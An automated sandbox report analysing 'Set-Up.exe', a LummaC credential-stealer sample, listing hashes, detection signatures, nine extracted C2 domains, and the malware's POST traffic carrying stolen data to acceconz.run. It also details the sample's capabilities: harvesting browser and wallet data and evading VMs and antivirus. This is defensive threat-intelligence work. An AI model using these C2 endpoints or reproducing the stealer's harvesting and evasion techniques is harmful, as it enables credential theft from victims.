Edit tour

Windows Analysis Report
Set-Up.exe

Overview

General Information

Sample name:	Set-Up.exe
Analysis ID:	1664098
MD5:	9a0898e5ab58c270560b4b01a675b872
SHA1:	817c83c38da6abde4ddf3fbbaba895d35a8bb83c
SHA256:	45ccc7a67360fcd58fe7b45b9666d5e9e6c072009dae7bbae02d6e487811e611
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Set-Up.exe (PID: 7936 cmdline: "C:\Users\user\Desktop\Set-Up.exe" MD5: 9A0898E5AB58C270560B4B01A675B872)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["acceconz.run/oxap", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.1563331052.0000000003882000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.1581016383.0000000003882000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000003.00000003.1536461322.0000000003882000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Set-Up.exe PID: 7936	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Set-Up.exe PID: 7936	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-13T16:21:26.207931+0200	2028371	3	Unknown Traffic	192.168.2.5	49696	172.67.131.70	443	TCP
2025-04-13T16:21:28.020856+0200	2028371	3	Unknown Traffic	192.168.2.5	49699	172.67.131.70	443	TCP
2025-04-13T16:21:29.524469+0200	2028371	3	Unknown Traffic	192.168.2.5	49700	172.67.131.70	443	TCP
2025-04-13T16:21:30.812705+0200	2028371	3	Unknown Traffic	192.168.2.5	49701	172.67.131.70	443	TCP
2025-04-13T16:21:32.806562+0200	2028371	3	Unknown Traffic	192.168.2.5	49702	172.67.131.70	443	TCP
2025-04-13T16:21:34.094122+0200	2028371	3	Unknown Traffic	192.168.2.5	49703	172.67.131.70	443	TCP
2025-04-13T16:21:36.637717+0200	2028371	3	Unknown Traffic	192.168.2.5	49704	172.67.131.70	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: jawdedmirror.run/ewqd	Avira URL Cloud: Label: malware
Source: nighetwhisper.top/lekd	Avira URL Cloud: Label: malware
Source: owlflright.digital/qopy	Avira URL Cloud: Label: malware
Source: lonfgshadow.live/xawi	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["acceconz.run/oxap", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e"}

Multi AV Scanner detection for submitted file

Source: Set-Up.exe

Virustotal: Detection: 8%

Perma Link

Sample uses string decryption to hide its real strings

Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: acceconz.run/oxap
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jawdedmirror.run/ewqd
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: changeaie.top/geps
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lonfgshadow.live/xawi
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: liftally.top/xasj
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: nighetwhisper.top/lekd
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: salaccgfa.top/gsooz
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: zestmodp.top/zeda
Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp	String decryptor: owlflright.digital/qopy

Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5F3B1 CryptUnprotectData,	3_3_02A5F3B1
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5A19B CryptUnprotectData,	3_3_02A5A19B
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_3_02A5F68D CryptUnprotectData,	3_3_02A5F68D
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 3_2_00406659 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenKey,CertStrToNameA,CertStrToNameA,_malloc,CertStrToNameA,GetSystemTime,__strdup,CertCreateSelfSignCertificate,CryptAcquireCertificatePrivateKey,CertOpenStore,PFXExportCertStoreEx,PFXExportCertStoreEx,CryptMemAlloc,PFXExportCertStoreEx,_memset,CryptBinaryToStringA,CryptBinaryToStringA,_memset,CryptBinaryToStringA,CryptMemFree,CertCloseStore,CryptReleaseContext,CertFreeCertificateContext,	3_2_00406659

Source: Set-Up.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.131.70:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_005B268A __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime32_t,__wsopen_s,__fstat32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,

3_2_005B268A

Source: C:\Users\user\Desktop\Set-Up.exe

Code function: 3_2_00403747 _memset,GetLogicalDriveStringsA,

3_2_00403747

Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then lea edx, dword ptr [ecx+eax]	3_3_02A6FAE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7229661Dh	3_3_02A900B0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]	3_3_02A908D0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2AF18DF6h]	3_3_02A84680
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then add ecx, eax	3_3_02A84680
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov eax, edx	3_3_02A8EF70
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then lea edx, dword ptr [eax-10h]	3_3_02A51748
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]	3_3_02A8FCB0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	3_3_02A8FCB0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	3_3_02A605B0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], D397AED6h	3_3_02A605B0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov ecx, esi	3_3_02A5BAAF
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_3_02A4B2B0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+esi]	3_3_02A4CAC0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]	3_3_02A90AC0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	3_3_02A69230
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 91942B0Dh	3_3_02A5AA0B
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov word ptr [eax], cx	3_3_02A62270
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-0154764Eh]	3_3_02A8D250
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+26025E6Bh]	3_3_02A5A3A3
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_3_02A72389
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-21043798h]	3_3_02A6EBE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov dword ptr [esp+14h], eax	3_3_02A4F3F6
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	3_3_02A89BD0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-755ACB0Ah]	3_3_02A67B20
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000000D8h]	3_3_02A50B40
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+60h]	3_3_02A6F080
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then jmp eax	3_3_02A708F5
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+00h]	3_3_02A4A8C0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]	3_3_02A63815
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+679F28F4h]	3_3_02A8A810
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]	3_3_02A62E12
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-07F6ED88h]	3_3_02A8F850
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+eax]	3_3_02A8F850
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	3_3_02A70199
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then add edx, FFFFFFFEh	3_3_02A85910
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then push 00000020h	3_3_02A5D16C
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp word ptr [edi+ecx], 0000h	3_3_02A62969
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_3_02A49EC0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_3_02A49EC0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	3_3_02A8C620
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02E528A0h]	3_3_02A62E12
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+34h]	3_3_02A5AE42
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-6D8E8D46h]	3_3_02A50789
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], FDD2FF0Ch	3_3_02A887F0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-48B40644h]	3_3_02A64965
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-48B40644h]	3_3_02A64F4C
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then cmp word ptr [eax+ecx], 0000h	3_3_02A5DCB8
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ecx, word ptr [ebx+eax]	3_3_02A63C80
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	3_3_02A63C80
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edi+679F28F4h]	3_3_02A894F0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_3_02A73DB0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax+00h]	3_3_02A41DE0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov word ptr [esi], cx	3_3_02A725D0
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then mov edx, 00000001h	3_3_02A63565
Source: C:\Users\user\Desktop\Set-Up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+78h]	3_3_02A5FD50

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: acceconz.run/oxap
Source: Malware configuration extractor	URLs: jawdedmirror.run/ewqd
Source: Malware configuration extractor	URLs: changeaie.top/geps
Source: Malware configuration extractor	URLs: lonfgshadow.live/xawi
Source: Malware configuration extractor	URLs: liftally.top/xasj
Source: Malware configuration extractor	URLs: nighetwhisper.top/lekd
Source: Malware configuration extractor	URLs: salaccgfa.top/gsooz
Source: Malware configuration extractor	URLs: zestmodp.top/zeda
Source: Malware configuration extractor	URLs: owlflright.digital/qopy

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.131.70:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 172.67.131.70:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 172.67.131.70:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 172.67.131.70:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 172.67.131.70:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 172.67.131.70:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49696 -> 172.67.131.70:443

Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: acceconz.run
Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3Mb3hKUEt0zIv86hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14913Host: acceconz.run
Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CQvUMInU4vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15032Host: acceconz.run
Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=vdIMO48pGI65MvY05User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20556Host: acceconz.run
Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=p2GWAU9tdbOEbIUzbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2547Host: acceconz.run
Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hKMn53GCpUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 588897Host: acceconz.run
Source: global traffic	HTTP traffic detected: POST /oxap HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 89Host: acceconz.run

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: Set-Up.exe	String found in binary or memory: ^f2=8000000pref/##/??//googleyoutube.comwww.youtube.comsearch_queryYoutubem.youtube.com/resultsYoutube mobilesearch.yahooyahoo.comvmpYahoowww.ebayebaywww.ebay.comebay.com/sch/i.html_nkweBayflickr.comwww.flickr.comFlickryandex.rubaidu.comwdwordBaiduwww.blip.tvblip.tvBlip TVpinterest.comwww.pinterest.comPinterestsearch.conduit.comConduitsearch.comwww.search.comSearchisearch.babylon.comBabylonwww.wolframalpha.comiWolframalphasearch.goo.ne.jpmtGooszukaj.onet.plOnetsearch.daum.netDaumoptu.search-help.netSearch-Helpsearch.walla.co.ilWallawww.infospace.comwww.zoo.comzoo.comZoowww.mahalo.commahalo.comMahalomystart.facemoods.comsearch.facemoods.comsFacemoodswww.youdao.comyoudao.comYoudaosearch.aol.comAolwww.volunia.comvolunia.comVoluniawww.videos.comvideos.comVideosinfospace.comInfospacewww.soso.comsoso.comwSosowww.hotbot.comhotbot.comHotbotyandex.com.trwww.yandex.com.trwww.yandex.comyandex.comtextYandexIsearch.mywebsearch.comMywebsearchwww.info.cominfo.comqkwInfosearch.lycos.comLycoswww.goodsearch.comgoodsearch.comkeywordsGoodSearchdeeperweb.comDeeperwebwww.metacrawler.commetacrawler.comMetacrawlersearch.v9.comv9.comV9weheartit.comWeheartitmsxml.excite.comExcitewww.entireweb.comentireweb.comEntireWebecosia.orgEcosiasearch.yippy.comYippywww.k9safesearch.comk9safesearch.comK9www.duckduckgo.comduckduckgo.comDuckduckgowww.qwant.comQwantsearch.pch.compchwww.gigablast.comgigablast.comGigablastwww.webopedia.comwebopedia.comWebopediawww.dogpile.comdogpile.comDogpilewebcrawler.comwww.webcrawler.comWebCrawlerask.comwww.ask.comAsksmugsmug.comwww.smugsmug.comSearchWordsSmugmugfotolog.comwww.fotolog.comFotologsearch.myway.comint.search.myway.comsearchforMywaysearch.safehomepage.comsafehomepage.comSafehomepagewww.wiki.com/results1.htmwiki.comvimeo.comwww.vimeo.comVimeowww.photo.netphoto.netwebshots.comwww.webshots.comWebshotstwitpic.comwww.twitpic.com/tagTwitpicwww.najdi.si/najdiNajdiimageshack.uswww.imageshack.us/photosImageshackwww.amfibi.comamfibi.comAmfibiwww.websearch.comwebsearch.comwebsearchwww.picsearch.comPicsearchsearch.seznam.czSeznamnova.rambler.ruRamblerwww.similarsitesearch.comSimilarsitesearchblekko.comBlekkowww.sogou.comsogou.comquerySogouwww.shutterstock.comshutterstock.com/cat.mhtmlsearchtermShutterstocksearch.webssearches.comwebssearches.comWebssearcheswww.chinaso.comchinaso.comChinasowww.fotolia.comfotolia.comkFotoliawww.findamo.comfindamo.comFindamopicasaweb.google.comPicasamedia.photobucket.comphotobucket.comwww.photobucket.comPhotobucketTuvarutwitter.comwww.twitter.comTwittervube.comwww.vube.comVubevideo.so.comimage.so.comso.comwww.so.comSosoku.comwww.soku.com/vkeywordSokusearch.naver.jpsearch.naver.comwww.naver.jpNavertopsy.comwww.topsy.comTopsygovome.comwww.govome.comGovomesearch.globososo.comglobososo.comwww.globososo.com/webGlobososointernet.comwww.internet.com/listings/Internetwow.comwww.wow.comWowtuvaro.comwww.tuvaro.com/ws/Tuvaromysearchresults.comwww.mysearchresults.com/search.phpMysearchresultsbing.comwww.bing.comstrictadlt/searchBingim
Source: Set-Up.exe	String found in binary or memory: ^f2=8000000pref/##/??//googleyoutube.comwww.youtube.comsearch_queryYoutubem.youtube.com/resultsYoutube mobilesearch.yahooyahoo.comvmpYahoowww.ebayebaywww.ebay.comebay.com/sch/i.html_nkweBayflickr.comwww.flickr.comFlickryandex.rubaidu.comwdwordBaiduwww.blip.tvblip.tvBlip TVpinterest.comwww.pinterest.comPinterestsearch.conduit.comConduitsearch.comwww.search.comSearchisearch.babylon.comBabylonwww.wolframalpha.comiWolframalphasearch.goo.ne.jpmtGooszukaj.onet.plOnetsearch.daum.netDaumoptu.search-help.netSearch-Helpsearch.walla.co.ilWallawww.infospace.comwww.zoo.comzoo.comZoowww.mahalo.commahalo.comMahalomystart.facemoods.comsearch.facemoods.comsFacemoodswww.youdao.comyoudao.comYoudaosearch.aol.comAolwww.volunia.comvolunia.comVoluniawww.videos.comvideos.comVideosinfospace.comInfospacewww.soso.comsoso.comwSosowww.hotbot.comhotbot.comHotbotyandex.com.trwww.yandex.com.trwww.yandex.comyandex.comtextYandexIsearch.mywebsearch.comMywebsearchwww.info.cominfo.comqkwInfosearch.lycos.comLycoswww.goodsearch.comgoodsearch.comkeywordsGoodSearchdeeperweb.comDeeperwebwww.metacrawler.commetacrawler.comMetacrawlersearch.v9.comv9.comV9weheartit.comWeheartitmsxml.excite.comExcitewww.entireweb.comentireweb.comEntireWebecosia.orgEcosiasearch.yippy.comYippywww.k9safesearch.comk9safesearch.comK9www.duckduckgo.comduckduckgo.comDuckduckgowww.qwant.comQwantsearch.pch.compchwww.gigablast.comgigablast.comGigablastwww.webopedia.comwebopedia.comWebopediawww.dogpile.comdogpile.comDogpilewebcrawler.comwww.webcrawler.comWebCrawlerask.comwww.ask.comAsksmugsmug.comwww.smugsmug.comSearchWordsSmugmugfotolog.comwww.fotolog.comFotologsearch.myway.comint.search.myway.comsearchforMywaysearch.safehomepage.comsafehomepage.comSafehomepagewww.wiki.com/results1.htmwiki.comvimeo.comwww.vimeo.comVimeowww.photo.netphoto.netwebshots.comwww.webshots.comWebshotstwitpic.comwww.twitpic.com/tagTwitpicwww.najdi.si/najdiNajdiimageshack.uswww.imageshack.us/photosImageshackwww.amfibi.comamfibi.comAmfibiwww.websearch.comwebsearch.comwebsearchwww.picsearch.comPicsearchsearch.seznam.czSeznamnova.rambler.ruRamblerwww.similarsitesearch.comSimilarsitesearchblekko.comBlekkowww.sogou.comsogou.comquerySogouwww.shutterstock.comshutterstock.com/cat.mhtmlsearchtermShutterstocksearch.webssearches.comwebssearches.comWebssearcheswww.chinaso.comchinaso.comChinasowww.fotolia.comfotolia.comkFotoliawww.findamo.comfindamo.comFindamopicasaweb.google.comPicasamedia.photobucket.comphotobucket.comwww.photobucket.comPhotobucketTuvarutwitter.comwww.twitter.comTwittervube.comwww.vube.comVubevideo.so.comimage.so.comso.comwww.so.comSosoku.comwww.soku.com/vkeywordSokusearch.naver.jpsearch.naver.comwww.naver.jpNavertopsy.comwww.topsy.comTopsygovome.comwww.govome.comGovomesearch.globososo.comglobososo.comwww.globososo.com/webGlobososointernet.comwww.internet.com/listings/Internetwow.comwww.wow.comWowtuvaro.comwww.tuvaro.com/ws/Tuvaromysearchresults.comwww.mysearchresults.com/search.phpMysearchresultsbing.comwww.bing.comstrictadlt/searchBingim
Source: Set-Up.exe	String found in binary or memory: ^f2=8000000pref/##/??//googleyoutube.comwww.youtube.comsearch_queryYoutubem.youtube.com/resultsYoutube mobilesearch.yahooyahoo.comvmpYahoowww.ebayebaywww.ebay.comebay.com/sch/i.html_nkweBayflickr.comwww.flickr.comFlickryandex.rubaidu.comwdwordBaiduwww.blip.tvblip.tvBlip TVpinterest.comwww.pinterest.comPinterestsearch.conduit.comConduitsearch.comwww.search.comSearchisearch.babylon.comBabylonwww.wolframalpha.comiWolframalphasearch.goo.ne.jpmtGooszukaj.onet.plOnetsearch.daum.netDaumoptu.search-help.netSearch-Helpsearch.walla.co.ilWallawww.infospace.comwww.zoo.comzoo.comZoowww.mahalo.commahalo.comMahalomystart.facemoods.comsearch.facemoods.comsFacemoodswww.youdao.comyoudao.comYoudaosearch.aol.comAolwww.volunia.comvolunia.comVoluniawww.videos.comvideos.comVideosinfospace.comInfospacewww.soso.comsoso.comwSosowww.hotbot.comhotbot.comHotbotyandex.com.trwww.yandex.com.trwww.yandex.comyandex.comtextYandexIsearch.mywebsearch.comMywebsearchwww.info.cominfo.comqkwInfosearch.lycos.comLycoswww.goodsearch.comgoodsearch.comkeywordsGoodSearchdeeperweb.comDeeperwebwww.metacrawler.commetacrawler.comMetacrawlersearch.v9.comv9.comV9weheartit.comWeheartitmsxml.excite.comExcitewww.entireweb.comentireweb.comEntireWebecosia.orgEcosiasearch.yippy.comYippywww.k9safesearch.comk9safesearch.comK9www.duckduckgo.comduckduckgo.comDuckduckgowww.qwant.comQwantsearch.pch.compchwww.gigablast.comgigablast.comGigablastwww.webopedia.comwebopedia.comWebopediawww.dogpile.comdogpile.comDogpilewebcrawler.comwww.webcrawler.comWebCrawlerask.comwww.ask.comAsksmugsmug.comwww.smugsmug.comSearchWordsSmugmugfotolog.comwww.fotolog.comFotologsearch.myway.comint.search.myway.comsearchforMywaysearch.safehomepage.comsafehomepage.comSafehomepagewww.wiki.com/results1.htmwiki.comvimeo.comwww.vimeo.comVimeowww.photo.netphoto.netwebshots.comwww.webshots.comWebshotstwitpic.comwww.twitpic.com/tagTwitpicwww.najdi.si/najdiNajdiimageshack.uswww.imageshack.us/photosImageshackwww.amf